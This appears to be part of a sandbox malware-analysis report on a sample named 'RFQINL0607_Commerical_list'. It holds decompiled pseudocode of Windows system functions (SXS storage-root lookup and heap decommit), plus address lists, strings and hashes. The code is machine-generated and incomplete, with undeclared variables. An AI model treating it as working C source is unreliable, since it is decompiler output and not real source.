				void* _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x3332120c) {
					E333DEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(L33382C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E333DEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E3338265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E333DEF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E33382919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E333DEF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}














                                                                                                                                                                                  0x33382594
                                                                                                                                                                                  0x33382594
                                                                                                                                                                                  0x3338259c
                                                                                                                                                                                  0x333825a6
                                                                                                                                                                                  0x333825a9
                                                                                                                                                                                  0x333825ac
                                                                                                                                                                                  0x333825b6
                                                                                                                                                                                  0x333c1f77
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333825bc
                                                                                                                                                                                  0x333825bc
                                                                                                                                                                                  0x333825c1
                                                                                                                                                                                  0x333825c3
                                                                                                                                                                                  0x333825c3
                                                                                                                                                                                  0x333825c5
                                                                                                                                                                                  0x333825ce
                                                                                                                                                                                  0x333c1fbc
                                                                                                                                                                                  0x333c1fc1
                                                                                                                                                                                  0x333c1fc2
                                                                                                                                                                                  0x333c1fc3
                                                                                                                                                                                  0x333c1fd1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333825e5
                                                                                                                                                                                  0x333825fc
                                                                                                                                                                                  0x33382600
                                                                                                                                                                                  0x333c1f81
                                                                                                                                                                                  0x333c1f82
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382606
                                                                                                                                                                                  0x33382606
                                                                                                                                                                                  0x3338260b
                                                                                                                                                                                  0x3338264a
                                                                                                                                                                                  0x3338264a
                                                                                                                                                                                  0x3338260d
                                                                                                                                                                                  0x3338260d
                                                                                                                                                                                  0x33382612
                                                                                                                                                                                  0x33382655
                                                                                                                                                                                  0x33382655
                                                                                                                                                                                  0x33382614
                                                                                                                                                                                  0x33382614
                                                                                                                                                                                  0x33382619
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338261b
                                                                                                                                                                                  0x3338261e
                                                                                                                                                                                  0x333c1fa0
                                                                                                                                                                                  0x333c1fa3
                                                                                                                                                                                  0x333c1fb2
                                                                                                                                                                                  0x333c1fd9
                                                                                                                                                                                  0x333c1fd9
                                                                                                                                                                                  0x33382624
                                                                                                                                                                                  0x3338262e
                                                                                                                                                                                  0x33382632
                                                                                                                                                                                  0x333c1f89
                                                                                                                                                                                  0x333c1f8a
                                                                                                                                                                                  0x333c1f8f
                                                                                                                                                                                  0x333c1f8f
                                                                                                                                                                                  0x333c1f91
                                                                                                                                                                                  0x333c1f93
                                                                                                                                                                                  0x33382638
                                                                                                                                                                                  0x3338263e
                                                                                                                                                                                  0x33382643
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382645
                                                                                                                                                                                  0x33382648
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33382648
                                                                                                                                                                                  0x33382643
                                                                                                                                                                                  0x33382632
                                                                                                                                                                                  0x3338261e
                                                                                                                                                                                  0x33382619
                                                                                                                                                                                  0x33382612
                                                                                                                                                                                  0x3338260b
                                                                                                                                                                                  0x33382600
                                                                                                                                                                                  0x333825ce
                                                                                                                                                                                  0x33382652

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 333C1F8A
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 333C1FC9
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 333C1F82
                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 333C1F6A, 333C1FA4, 333C1FC4
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 333C1F6F
                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 333C1FA9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                  • Opcode ID: c7eab1301baed0aecef280058d7461172a71ffe9b8c15b2b04ddf59fc34c0d34
                                                                                                                                                                                  • Instruction ID: 42f0502838d080a73ed9b3300d6cc16afbdfd3ca3384606882ec2bf51129a8a5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c7eab1301baed0aecef280058d7461172a71ffe9b8c15b2b04ddf59fc34c0d34
                                                                                                                                                                                  • Instruction Fuzzy Hash: CF31E57AE062287FF7108E85CC81F5B7A6CDB41690F05C299F910AB252C7B0EE04DBE0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33360680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                  			E33360680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E33360ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x33446960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E3334B910();
						} else {
							E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E3334B910();
						__eflags =  *0x33445da8;
						if(__eflags == 0) {
							L3340FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x33446d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x334491e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E33392BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E33415FED(0, _t300, "true", _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x3344373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E33392B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E3340EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E3340D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E33415FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E3336096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E33415FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = L33363C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E3340F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = L33363C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E3340F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E3336036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E33415FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E33415FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x3344432c; // 0x0
						_v24 = 0x3344432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}
























































                                                                                                                                                                                  0x33360689
                                                                                                                                                                                  0x3336068d
                                                                                                                                                                                  0x33360690
                                                                                                                                                                                  0x33360699
                                                                                                                                                                                  0x333606a3
                                                                                                                                                                                  0x33360929
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33360929
                                                                                                                                                                                  0x333606b0
                                                                                                                                                                                  0x333b4e97
                                                                                                                                                                                  0x333b4e99
                                                                                                                                                                                  0x333b4e9f
                                                                                                                                                                                  0x333b4ea5
                                                                                                                                                                                  0x333b4ea9
                                                                                                                                                                                  0x333b4eca
                                                                                                                                                                                  0x333b4ecf
                                                                                                                                                                                  0x333b4eab
                                                                                                                                                                                  0x333b4ec0
                                                                                                                                                                                  0x333b4ec5
                                                                                                                                                                                  0x333b4ed7
                                                                                                                                                                                  0x333b4edc
                                                                                                                                                                                  0x333b4ee4
                                                                                                                                                                                  0x333b4eeb
                                                                                                                                                                                  0x333b4ef6
                                                                                                                                                                                  0x333b4ef6
                                                                                                                                                                                  0x333b4eeb
                                                                                                                                                                                  0x333b4e99
                                                                                                                                                                                  0x333606b6
                                                                                                                                                                                  0x333606b9
                                                                                                                                                                                  0x333606b9
                                                                                                                                                                                  0x333606be
                                                                                                                                                                                  0x33360921
                                                                                                                                                                                  0x333606c4
                                                                                                                                                                                  0x333606c4
                                                                                                                                                                                  0x333606c4
                                                                                                                                                                                  0x333606ca
                                                                                                                                                                                  0x333606d3
                                                                                                                                                                                  0x333606d9
                                                                                                                                                                                  0x333606dc
                                                                                                                                                                                  0x333b4f0a
                                                                                                                                                                                  0x333b4f10
                                                                                                                                                                                  0x333b4f13
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333606e2
                                                                                                                                                                                  0x333606e2
                                                                                                                                                                                  0x333606f2
                                                                                                                                                                                  0x33360930
                                                                                                                                                                                  0x33360936
                                                                                                                                                                                  0x33360938
                                                                                                                                                                                  0x3336093e
                                                                                                                                                                                  0x3336093e
                                                                                                                                                                                  0x33360938
                                                                                                                                                                                  0x333606ff
                                                                                                                                                                                  0x333b4f1b
                                                                                                                                                                                  0x333b4f1d
                                                                                                                                                                                  0x333b4f22
                                                                                                                                                                                  0x333b4f29
                                                                                                                                                                                  0x333b4f2a
                                                                                                                                                                                  0x333b4f2c
                                                                                                                                                                                  0x333b4f2d
                                                                                                                                                                                  0x333b4f2f
                                                                                                                                                                                  0x333b4f34
                                                                                                                                                                                  0x333b4f36
                                                                                                                                                                                  0x333b4f39
                                                                                                                                                                                  0x333b4f44
                                                                                                                                                                                  0x333b4f4d
                                                                                                                                                                                  0x333b4f4f
                                                                                                                                                                                  0x333b4f54
                                                                                                                                                                                  0x333b4f5b
                                                                                                                                                                                  0x333b4f5b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4f5b
                                                                                                                                                                                  0x333b4f3b
                                                                                                                                                                                  0x333b4f3d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4f3f
                                                                                                                                                                                  0x333b4f42
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33360705
                                                                                                                                                                                  0x33360705
                                                                                                                                                                                  0x3336070c
                                                                                                                                                                                  0x3336070e
                                                                                                                                                                                  0x33360724
                                                                                                                                                                                  0x33360727
                                                                                                                                                                                  0x3336072d
                                                                                                                                                                                  0x33360730
                                                                                                                                                                                  0x33360751
                                                                                                                                                                                  0x33360751
                                                                                                                                                                                  0x33360757
                                                                                                                                                                                  0x3336075c
                                                                                                                                                                                  0x3336075d
                                                                                                                                                                                  0x3336075f
                                                                                                                                                                                  0x33360760
                                                                                                                                                                                  0x33360762
                                                                                                                                                                                  0x33360767
                                                                                                                                                                                  0x3336076a
                                                                                                                                                                                  0x3336076a
                                                                                                                                                                                  0x33360770
                                                                                                                                                                                  0x33360772
                                                                                                                                                                                  0x333b4f9f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4f9f
                                                                                                                                                                                  0x3336077e
                                                                                                                                                                                  0x33360783
                                                                                                                                                                                  0x333b4faa
                                                                                                                                                                                  0x333b4fad
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4fbc
                                                                                                                                                                                  0x3336078e
                                                                                                                                                                                  0x33360791
                                                                                                                                                                                  0x333b4fcc
                                                                                                                                                                                  0x333b4fd3
                                                                                                                                                                                  0x333b4fe2
                                                                                                                                                                                  0x333b4fe2
                                                                                                                                                                                  0x333b4fd3
                                                                                                                                                                                  0x3336079b
                                                                                                                                                                                  0x333607a0
                                                                                                                                                                                  0x333607a4
                                                                                                                                                                                  0x333607b0
                                                                                                                                                                                  0x333607b7
                                                                                                                                                                                  0x333b4fec
                                                                                                                                                                                  0x333b4ff1
                                                                                                                                                                                  0x333b4ff1
                                                                                                                                                                                  0x333607b7
                                                                                                                                                                                  0x333607bd
                                                                                                                                                                                  0x333607c1
                                                                                                                                                                                  0x333607c5
                                                                                                                                                                                  0x333607c8
                                                                                                                                                                                  0x333607cb
                                                                                                                                                                                  0x333607d0
                                                                                                                                                                                  0x333607d3
                                                                                                                                                                                  0x333607d3
                                                                                                                                                                                  0x333607d6
                                                                                                                                                                                  0x333b5008
                                                                                                                                                                                  0x333607e4
                                                                                                                                                                                  0x333607e4
                                                                                                                                                                                  0x333607e6
                                                                                                                                                                                  0x333607e6
                                                                                                                                                                                  0x333607e9
                                                                                                                                                                                  0x333607ee
                                                                                                                                                                                  0x3336081b
                                                                                                                                                                                  0x3336081b
                                                                                                                                                                                  0x3336081e
                                                                                                                                                                                  0x33360827
                                                                                                                                                                                  0x3336082d
                                                                                                                                                                                  0x33360833
                                                                                                                                                                                  0x33360839
                                                                                                                                                                                  0x3336083f
                                                                                                                                                                                  0x33360848
                                                                                                                                                                                  0x333608fd
                                                                                                                                                                                  0x33360903
                                                                                                                                                                                  0x33360903
                                                                                                                                                                                  0x3336084e
                                                                                                                                                                                  0x33360851
                                                                                                                                                                                  0x33360855
                                                                                                                                                                                  0x33360945
                                                                                                                                                                                  0x3336094d
                                                                                                                                                                                  0x33360950
                                                                                                                                                                                  0x33360953
                                                                                                                                                                                  0x33360964
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33360964
                                                                                                                                                                                  0x33360955
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336085b
                                                                                                                                                                                  0x3336085b
                                                                                                                                                                                  0x3336086e
                                                                                                                                                                                  0x33360876
                                                                                                                                                                                  0x33360879
                                                                                                                                                                                  0x33360879
                                                                                                                                                                                  0x3336087c
                                                                                                                                                                                  0x33360880
                                                                                                                                                                                  0x33360885
                                                                                                                                                                                  0x333608dd
                                                                                                                                                                                  0x333608de
                                                                                                                                                                                  0x333608e1
                                                                                                                                                                                  0x333608e6
                                                                                                                                                                                  0x333608f3
                                                                                                                                                                                  0x333608f8
                                                                                                                                                                                  0x333608f8
                                                                                                                                                                                  0x33360887
                                                                                                                                                                                  0x33360887
                                                                                                                                                                                  0x33360887
                                                                                                                                                                                  0x33360889
                                                                                                                                                                                  0x33360892
                                                                                                                                                                                  0x33360897
                                                                                                                                                                                  0x333b505d
                                                                                                                                                                                  0x333b5060
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b506f
                                                                                                                                                                                  0x333608a2
                                                                                                                                                                                  0x333608a5
                                                                                                                                                                                  0x333b5079
                                                                                                                                                                                  0x333b507f
                                                                                                                                                                                  0x333b5086
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b5091
                                                                                                                                                                                  0x333b5093
                                                                                                                                                                                  0x333b50a5
                                                                                                                                                                                  0x333b5095
                                                                                                                                                                                  0x333b509e
                                                                                                                                                                                  0x333b509e
                                                                                                                                                                                  0x333b50af
                                                                                                                                                                                  0x333b50be
                                                                                                                                                                                  0x333608ae
                                                                                                                                                                                  0x333608b4
                                                                                                                                                                                  0x333608b9
                                                                                                                                                                                  0x333b50c8
                                                                                                                                                                                  0x333b50cb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b50da
                                                                                                                                                                                  0x333608c4
                                                                                                                                                                                  0x333608c7
                                                                                                                                                                                  0x333b50e9
                                                                                                                                                                                  0x333b50eb
                                                                                                                                                                                  0x333b50fd
                                                                                                                                                                                  0x333b50ed
                                                                                                                                                                                  0x333b50f6
                                                                                                                                                                                  0x333b50f6
                                                                                                                                                                                  0x333b5113
                                                                                                                                                                                  0x333b5113
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333608cd
                                                                                                                                                                                  0x333608bf
                                                                                                                                                                                  0x333608bf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333608bf
                                                                                                                                                                                  0x333608ab
                                                                                                                                                                                  0x333608ab
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333608ab
                                                                                                                                                                                  0x3336089d
                                                                                                                                                                                  0x3336089d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336089d
                                                                                                                                                                                  0x333607f0
                                                                                                                                                                                  0x333607f0
                                                                                                                                                                                  0x333607f8
                                                                                                                                                                                  0x333b5014
                                                                                                                                                                                  0x333b5017
                                                                                                                                                                                  0x333b501a
                                                                                                                                                                                  0x333b5036
                                                                                                                                                                                  0x333b503d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b501c
                                                                                                                                                                                  0x333b501c
                                                                                                                                                                                  0x333b501c
                                                                                                                                                                                  0x333b501e
                                                                                                                                                                                  0x333b5020
                                                                                                                                                                                  0x333b5023
                                                                                                                                                                                  0x333b5026
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b5028
                                                                                                                                                                                  0x333b502b
                                                                                                                                                                                  0x333b502e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b5030
                                                                                                                                                                                  0x333b5035
                                                                                                                                                                                  0x333b5035
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b5035
                                                                                                                                                                                  0x333607fe
                                                                                                                                                                                  0x333607fe
                                                                                                                                                                                  0x33360801
                                                                                                                                                                                  0x33360803
